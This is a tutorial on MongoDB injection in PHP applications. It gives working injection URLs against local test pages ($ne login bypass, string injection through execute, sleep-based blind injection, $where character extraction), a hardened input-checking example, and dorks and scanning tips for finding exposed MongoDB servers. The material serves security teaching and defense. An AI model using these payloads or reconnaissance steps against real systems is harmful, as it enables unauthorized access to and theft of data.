## 0x01 SQL injection

### MongoDB

There are two ways to operate MongoDB from PHP.

* Call the corresponding methods of the `mongo` class to insert, query, remove and update, for example:

```php
<?php
$mongo = new MongoClient();
$db = $mongo->myinfo;                                        // select the database
$coll = $db->test;                                           // select the collection
$coll->save(array('newsid' => 1));                           // insert
$coll->find(array('newsid' => 1));                           // query
$coll->remove(array('newsid' => 1));                         // remove
$coll->update(array('newsid' => 1), array('newsid' => 2));   // update
```

The arguments here are arrays.

* Call the `execute` method with a string, for example:

```php
<?php
$mongo = new MongoClient();
$db = $mongo->myinfo;                                   // select the database
$query = "db.table.save({'newsid':1})";                  // insert
$query = "db.table.find({'newsid':1})";                  // query
$query = "db.table.remove({'newsid':1})";                // remove
$query = "db.table.update({'newsid':1},{'newsid':2})";   // update
$result = $db->execute($query);
```

The argument of `execute` is the string variable `$query`, and that string is written in JavaScript syntax.

### Injection through array parameters

`test` is a username and password already known to the attacker. For the URL

```
http://127.0.0.1/2.php?username=test&password=test
```

the following is executed:

```
db.test.find({username:'test', password:'test'});
```

For the URL

```
http://127.0.0.1/2.php?username[xx]=test&password=test
```

`$username` is an array, which is equivalent to executing the PHP statement

```php
$data = array( 'username' => array('xx'=>'test'), 'password' => 'test' );
```

and, because of the way MongoDB parses the multi-dimensional array, what finally runs is

```
db.test.find({username:{'xx':'test'}, password:'test'});
```

For the URL

```
http://127.0.0.1/2.php?username[$ne]=test&password[$ne]=test
```

`$ne` happens to be a MongoDB operator, so the executed statement is

```
db.test.find({username:{'$ne':'test'}, password:{'$ne':'test'}});
```

which corresponds to the SQL

```sql
select * from test where username!='test' and password!='test';
```

The `$regex` operator can be used in the same way to extract data one character at a time.

### Injection through `execute`

```
http://127.0.0.1/1.php?username=test'&password=test
http://127.0.0.1/1.php?username=test'});return {username:1,password:2}//&password=test
```

The second URL returns `username` as `1` and `password` as `2`.

```
http://127.0.0.1/1.php?username=test'});return {username:tojson(db.getCollectionNames()),password:2}//&password=test
```

This returns the names of all collections in MongoDB. `db.getCollectionNames()` returns an array, so `tojson` is needed to convert it to a string; note also that MongoDB is case-sensitive.

```
http://127.0.0.1/1.php?username=test'});return {username:tojson(db.test.find()[0]),password:2}//&password=test
```

This returns the first document of the `test` collection.

`sleep()`, i.e. time-based blind injection:

```
http://127.0.0.1/1.php?username=test'});if (db.version() > "0") {sleep(10000); exit;} var b=({a:'1&password=test
```

### Injection through `$where`

MongoDB supports the `$where` operator, the counterpart of the `where` clause in a SQL statement. The `$where` operator in MongoDB usually takes a JavaScript function as the condition; when a string inside that JavaScript function contains unfiltered user input, injection occurs.

* Injection method

```
http://127.0.0.1/3.php?news=test
http://127.0.0.1/3.php?news=test'
// %26=&
http://127.0.0.1/3.php?news=test'%26%26'1'=='1
http://127.0.0.1/3.php?news=test'%26%26'1'=='2
http://127.0.0.1/3.php?news=test'%26%26db.getCollectionNames().length>0%26%26'1'=='1
http://127.0.0.1/3.php?news=test'%26%26db.getCollectionNames()[0].length==6%26%26'1'=='1
http://127.0.0.1/3.php?news=test'%26%26db.getCollectionNames()[0][0]>'a'%26%26'1'=='1
http://127.0.0.1/3.php?news=test'%26%26tojson(db.user.find()[0])[0]=='{'%26%26'1'=='1
```

`db.user.find()` does not return a string, so no character can be taken from it for comparison; `tojson` converts it into a JSON string, which can then be compared. A loop script written in Python automates this.
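As an added example that is not part of the original issue, here is the login check behind `2.php` written as the vulnerable filter builder beside a hardened one that rejects array parameters; it assumes the legacy `mongo` extension (`MongoClient`) used above, the `myinfo` database and `test` collection, and PHP 5-era syntax to match that driver.

```php
<?php
// Added example, not from the original issue: the 2.php login check in its
// vulnerable form next to a hardened form. Assumes the legacy mongo extension
// (MongoClient, PHP 5-era syntax) used in the issue, database "myinfo" and
// collection "test" with plain username/password fields.

// Vulnerable: whatever PHP parsed from the query string goes straight into the
// filter, so ?username[$ne]=x&password[$ne]=x turns both values into operators.
function buildFilterVulnerable(array $get)
{
    return array(
        'username' => $get['username'],
        'password' => $get['password'],
    );
}

// Hardened: each field must be a non-empty scalar string of sane length, so an
// array such as username[$ne]=x is refused before it can become an operator.
function buildFilterHardened(array $get)
{
    $filter = array();
    foreach (array('username', 'password') as $field) {
        if (!isset($get[$field]) || !is_string($get[$field])) {
            return false;                       // missing value or array: reject
        }
        if ($get[$field] === '' || strlen($get[$field]) > 64) {
            return false;                       // basic length sanity check
        }
        $filter[$field] = $get[$field];
    }
    return $filter;
}

// Constructed input: how PHP parses ?username[$ne]=test&password[$ne]=test
$attackerGet = array(
    'username' => array('$ne' => 'test'),
    'password' => array('$ne' => 'test'),
);
var_dump(buildFilterVulnerable($attackerGet)); // nested arrays, i.e. $ne operators, reach the filter
var_dump(buildFilterHardened($attackerGet));   // the hardened builder refuses this request

$filter = buildFilterHardened($_GET);          // refuse anything the hardened builder rejects
if ($filter === false) {
    http_response_code(400);
    exit('bad request');
}
$mongo = new MongoClient();
$user = $mongo->myinfo->test->findOne($filter);
echo $user ? 'login ok' : 'login failed';
```

The same rule applies to the `execute` and `$where` paths: user input must never be concatenated into the JavaScript string at all, since a type check alone does not help there.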
### Ways to locate MongoDB

* Port 27017, scanning C-class and B-class ranges, depending on bandwidth and server resources.
* Tools: Nmap, XScan, NC, WVS; usually Nmap.
* Google:

```
intitle:mongodb inurl:28017
intitle:mongodb inurl:28017 admin
```

Port 28017 is a MongoDB status page; where it is present, port 27017 usually is too. The page shows the IPs of external connections; a reverse DNS lookup on those IPs finds the site or application that connects. Another approach is to look at the database information, or to scan port 80 on the same subnet, or to scan port 80 on the external addresses that connect.

* ZoomEye and Shodan, the cyberspace search engines.